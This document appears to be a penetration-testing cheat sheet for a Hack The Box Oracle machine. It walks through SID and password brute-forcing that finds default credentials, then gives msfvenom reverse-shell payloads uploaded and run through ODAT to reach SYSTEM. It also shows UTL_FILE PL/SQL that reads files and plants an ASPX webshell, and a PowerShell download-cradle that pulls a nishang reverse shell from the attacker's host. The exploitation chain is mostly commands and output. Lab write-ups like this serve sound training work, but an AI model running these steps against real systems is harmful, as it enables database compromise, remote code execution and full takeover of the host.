Oracle

Scan

80     http IIS httpd 8.5
1521   oracle-tns 11.2.0.2.0 (unauthorized)
49160  oracletns listener (requires service name)

nmap

  • Found the SID

nmap -Pn -n -sV -p1521 --script=oracle* 10.x.x.x -e tun0

PORT     STATE SERVICE    VERSION
1521/tcp open  oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
|
| oracle-sid-brute:
|_  XE

hydra

  • Can find the SID too

hydra -L sids-oracle.txt -s 1521 10.10.10.82 oracle-sid

Oracle Client and ODAT Setup

git clone https://github.com/quentinhardy/odat
cd odat
git submodule init
git submodule update
sudo apt-get install libaio1 python-dev alien python-pip

oracle-instantclient-basic-base    .. download 64-bit rpm
oracle-instantclient-basic-sqlplus .. download 64-bit rpm
oracle-instantclient-devel         .. download 64-bit rpm

sudo alien --to-deb *.rpm          .. convert to deb (if you need)
dpkg -i *.deb                      .. install

vim /etc/profile                   .. bunch of edits (ref: ODAT)
export ORACLE_HOME ...
export LD_LIBRARY_PATH ...
export PATH=...

sql         ..<tab>                .. reopen terminal and try
sqlplus64   ..works!

pip2 install cx_Oracle             .. may also need this

Oracle SID

  • Find the SID with odat or metasploit

--------------------------
--------------------------
odat.py -h
odat.py sidguesser -h
odat.py sidguesser -s 10.x.x.x -p 1521
python3 odat.py sidguesser -s 10.x.x.x -p 1521 --sids-file /usr/share/odat/sids.txt
found 'XE', 'XEXDB'


--------------------------
--------------------------
msfconsole
search oracle
use auxiliary/scanner/oracle/sid_brute
set RHOSTS 10.x.x.x
run
found 'XE', 'XEXDB'

search scanner/oracle
use auxiliary/scanner/oracle/oracle_login
set RHOSTS 10.x.x.x
set SID XE  ..default
set RPORTS 1512
run  ..error 'closed'

Oracle Pass

--------------------------
--------------------------
odat.py passwordguesser -h
odat.py passwordguesser -s 10.x.x.x -d XE
odat.py passwordguesser -s 10.x.x.x -d XE -p 1521 --accounts-file myusers.txt

Normal:
cat odat/accounts/accounts.txt               ..problem: all UPPERCASE

--------------------------
--------------------------
Metasploit has a better file:
locate oracle_default_userpass               ..mixture upper/lower
cp oracle_default_userpass.txt accounts.txt  ..overwrite 
vim accounts.txt                             ..different
%s/ /\//g                                    ..sed to replace 'space' with '/'

--------------------------
--------------------------
user: scott                                  ..Found!
pass: tiger

Login with sqlplus

sqlplus64 scott/tiger@10.10.10.82:1521/XE
sqlplus64 scott/tiger@10.10.10.82:1521/XE as sysdba

select * from session_privs;
select * from user_role_privs;
exit

ODAT Upload and Execute

  • Requires: SID, User, Pass, Venom

--------------------------
utfile (upload)

msfvenom -p windows/shell_reverse_tcp -f exe lhost=10.10.14.31 lport=4444 -o shell.exe
python3 odat.py utlfile -s 10.x.x.x -p 1521 -U "scott" -P "tiger" -d XE -n -t --sysdba --putFile \temp shell.exe /htb/Silo/shell.exe

--------------------------
externaltable (execute)

python3 odat.py externaltable -s 10.x.x.x -p 1521 -U "scott" -P "tiger" -d XE -n -t --sysdba --exec /temp shell.exe
nc -nvlp 4444
system!

ODAT (with MSF)

  • Quick Method:

  • Straight to 'system' with ODAT

--------------------------
odat.py -h
odat.py utlfile -h       ..upload/download/delete
odat.py externaltable -h ..read/execute files/scripts

--------------------------
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.x.x.x LPORT=9002 -f exe -o venom.exe

odat.py utlfile -s $IP -d XE 
-U scott -P tiger 
--sysdba 
--putFile /temp venom.exe ../venom.exe

--------------------------
msfconsole  ..setup listener
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 9002
run

--------------------------
odat.py externaltable -s $IP -d XE 
-U scott -P tiger 
--sysdba 
--exec /temp venom.exe

--------------------------
mtp> getuid
system

Read a File - with sqlplus

  • You will need SID, User, Pass, sysdba privs

Login:
sqlplus64 scott/tiger@10.10.10.82:1521/XE as sysdba

SQL>

declare
  f utl_file.file_type;
  s varchar(200);
begin
  f := utl_file.fopen('/inetpub/wwwroot', 'iisstart.htm', 'R');
  f := utl_file.fopen('/root', 'root.txt', 'R');     ..optional
  utl_file.get_line(f,s);
  utl_file.fclose(f);
  dbms_output.put_line(s);
end;
/                      ..to run your command

set serveroutput ON    ..to allow output on screen
/                      ..run again (we see 200 chars)
flag!!

Make a File - with sqlplus

SQL>

declare
  f utl_file.file_type;
  s varchar(5000) := 'Hello Friends';
begin
  f := utl_file.fopen('/inetpub/wwwroot', 'helloworld.txt', 'W');
  utl_file.put_line(f,s);
  utl_file.fclose(f);
end;
/                      ..Successfully Completed


http://10.x.x.x/helloworld.txt  ..Worked!
Hello Friends

Make a Webshell - with sqlplus

--------------------------
--------------------------
locate aspx$
mkdir shells
cd shells
cp cmdasp.aspx .

wc -c cmdasp.aspx              ..1400 (oracle doesnt like > 1024 chars)
vi cmdasp.aspx                 ..clean it up
sed -z 's/\n//g' cmdasp.aspx   ..remove newline chars
wc -c cmdasp.aspx              ..1358
vi cmdasp.aspx                 ..clean it up
<head>                         ..remove
syle="Z..."                    ..remove
<!--comments-->                ..remove

sed -z 's/\n//g' cmdasp.aspx | wc -c  ..991 good
copy your one-liner
paste to

--------------------------
--------------------------
SQL>

declare
  f utl_file.file_type;
  s varchar(5000) := 'Paste your oneline cmdasp.aspx here';
begin
  f := utl_file.fopen('/inetpub/wwwroot', 'evilcmd.aspx', 'W');
  utl_file.put_line(f,s);
  utl_file.fclose(f);
end;
/                             .. Success


http://10.x.x.x/evilcmd.aspx  .. Worked!
whoami        .. execute!
whoami /all   .. see everyone

Webshell: Reverse PowerShell

--------------------
locate nishang shell
cp Invoke-PowerShellTcp.ps1 .
mkdir www
mv Invoke-PowerShellTcp.ps1 www/rev.ps1
vim rev.ps1
Add as last-line of script:
Invoke-PowerShellTcp -Reverse -IPAddres 10.x.x.x -Port 4444
python -m SimpleHTTPServer    ..to share rev.ps1

--------------------
http://10.x.x.x/evilcmd.aspx
powershell "IES(New-Object Net.WebClient).downloadString('http://10.x.x.x/rev.ps1')"

--------------------
nc -nvlp 4444                       .. listen
PS C:\windows>                      .. Reverse shell!
PS cd C:\Users\Phineas\Desktop
PS dir
PS> Get-Content "Oracle Issue.txt"  .. to read a file in Powershell

Enumerate the listener version

  • Interesting. Didnt use this though.

tnscmd10g version -p 1521 -h 10.x.x.x
tnscmd10g status -h 10.x.x.x
tnscmd10g status -h 10.x.x.x --10G
PreviousNFSNextPostgres

Last updated